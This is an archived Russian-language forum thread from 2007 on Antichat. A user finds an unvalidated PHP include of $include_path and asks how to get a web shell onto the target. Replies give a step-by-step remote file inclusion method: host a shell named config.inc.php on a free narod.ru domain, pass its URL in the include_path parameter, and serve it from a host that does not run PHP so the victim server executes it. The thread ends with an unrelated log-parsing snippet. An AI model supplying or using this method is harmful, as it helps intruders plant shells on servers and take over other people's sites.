ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.11.2007, 18:43
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
например так:
include $_GET[path]."date.php";
|
|
|
12.11.2007, 18:58
|
|
Познающий
Регистрация: 27.08.2007
Сообщений: 48
Провел на форуме:
91291
Репутация:
17
|
|
понятна,не я так не делаю.
|
|
|
|
12.11.2007, 23:42
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 3
Провел на форуме:
3344
Репутация:
0
|
|
Привет, в php скрипте, есть сл. код:
PHP код:
require_once $include_path."/include/config.inc.php";
Переменная "$include_path", никак не проверяется, т.е. я могу выполнить следующее:
target.php?include_path=http://somehost.ru
при условии, что на somehost.ru, есть "/include/config.inc.php".
Насколько я понял, подобная уязвимость описывается тут, но мне не совсем понятно, что нужно делать =/
Вопрос: что с этим делать дальше?
Как можно залить шел? |
|
|
|
12.11.2007, 23:49
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от InvisHero
Привет, в php скрипте, есть сл. код:
PHP код:
require_once $include_path."/include/config.inc.php";
Переменная "$include_path", никак не проверяется, т.е. я могу выполнить следующее:
target.php?include_path=http://somehost.ru
при условии, что на somehost.ru, есть "/include/config.inc.php".
Насколько я понял, подобная уязвимость описывается тут, но мне не совсем понятно, что нужно делать =/
Вопрос: что с этим делать дальше?
Как можно залить шел? Для начала тебе надо было задавать вопрос тут http://forum.antichat.ru/thread46016.html
Да ты прав бага есть и юзать ты можешь так как ты и сказал но есть одно НО! В php.ini должны быть включены register_globals без этого ты не сможешь заюзать эту багу... Ну а как шелл залить надеюсь догадаешься...
__________________
Кто я?..
|
|
|
|
13.11.2007, 00:07
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Насчет register_globals I-I()/Ib по идее правильно сказал, но есть куча функций, которые глобализируют переменную, это неплохо описал гемаглобин, а при хорошем раскладе (т.е. ты можешь в реквест пользовать эту переменную) ты можешь сделать следующее
зарегить на народе доменчик какой нить, ну например shell-dla-includa.narod.ru
создать там папку /include/ и в эту папку записать шелл и назвать его config.inc.php
далее через эту багу его подключить....target.php?include_path=ht tp://shell-dla-includa.narod.ru
__________________
Карфаген должен быть разрушен...
|
|
|
|
13.11.2007, 00:12
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 3
Провел на форуме:
3344
Репутация:
0
|
|
Сообщение от Scipio
Насчет register_globals I-I()/Ib по идее правильно сказал, но есть куча функций, которые глобализируют переменную, это неплохо описал гемаглобин, а при хорошем раскладе (т.е. ты можешь в реквест пользовать эту переменную) ты можешь сделать следующее
зарегить на народе доменчик какой нить, ну например shell-dla-includa.narod.ru
создать там папку /include/ и в эту папку записать шелл и назвать его config.inc.php
далее через эту багу его подключить....target.php?include_path=ht tp://shell-dla-includa.narod.ru
я именно так и делаю, но "config.inc.php", выполняется на удалённом сервере, а не на первичном.
|
|
|
|
13.11.2007, 00:17
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от InvisHero
я именно так и делаю, но "config.inc.php", выполняется на удалённом сервере, а не на первичном.
Господи ну ты еврей залей инклужимый скрипт туда где php не поддерживается!!!
Люди впишите в свои факи по инклудингу это крупным шрифтом на пол экрана... Бо я как смотрю это уже не первый впрос по этому поводу...
__________________
Кто я?..
Последний раз редактировалось I-I()/Ib; 13.11.2007 в 00:20..
|
|
|
|
13.11.2007, 00:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
ет народ.. позно уже голова не варит....
Помогите собрать регулярное выражение
192.168.101.215 - - [12/Nov/2007:18:28:32 +0300] "GET / HTTP/1.1" 200 4570
Регулярка на айпи, дату, запрос
П.С. Мне просто надо чтоб он(скрипт) выводил всьо ето красиво и табличках(логи)
__________________
BlackHat. MoDL
|
|
|
|
13.11.2007, 01:33
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 3
Провел на форуме:
3344
Репутация:
0
|
|
Всем спасибо)
|
|
|
|
13.11.2007, 16:32
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Dimi4, ну мну делалбы без регулярок... Токо это мну! А ты как хош 
Просто explode по пробелам...
PHP код:
<?
$s = '192.168.101.215 - - [12/Nov/2007:18:28:32 +0300] "GET / HTTP/1.1" 200 4570';
$s = explode(' ',$s);
echo "IP: {$s[0]}<br>
Date: {$s[3]} {$s[4]}<br>
Query: {$s[5]} {$s[6]} {$s[7]}";
?>
Хотя да... Криво получается... Но т.к. я регулярки незнаю, удачи |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?503349){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Линейный вид
